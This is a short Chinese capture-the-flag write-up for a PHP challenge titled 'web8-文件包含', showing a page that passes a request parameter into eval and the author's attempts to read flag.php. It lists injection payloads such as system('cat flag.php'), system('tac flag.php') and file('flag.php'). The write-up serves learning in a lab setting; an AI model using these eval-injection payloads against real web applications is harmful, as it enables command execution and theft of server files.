web8-文件包含

 <?php
    include "flag.php";
    $a = @$_REQUEST[‘hello‘];
    eval( "var_dump($a);");
    show_source(__FILE__);
?> 

Too Young Too Simple

分析题,flag在一个php文件中

@$_REQUEST 与$_GET、$_POST 用途差不多,前者是后两者的结合

给hello一个值会用eavl进行函数执行

刚开始想法很简单

index.php?hello=system(‘cat flag.php‘)

相当于一句话,

然后并没出来,怀疑自我,

参考了别人的,在源代码里找到了flag。。。

其它比较有意思的几种写法

  var_dump()函数可以打印

  index.php?hello=file(‘flag.php‘)

  index.php?hello=system(‘tac flag.php‘)  //cat 倒过来也可以,不明白。。

 

web8-文件包含

上一篇:如何从微信跳到外部浏览器进行apk文件(app)下载


下一篇:python脚本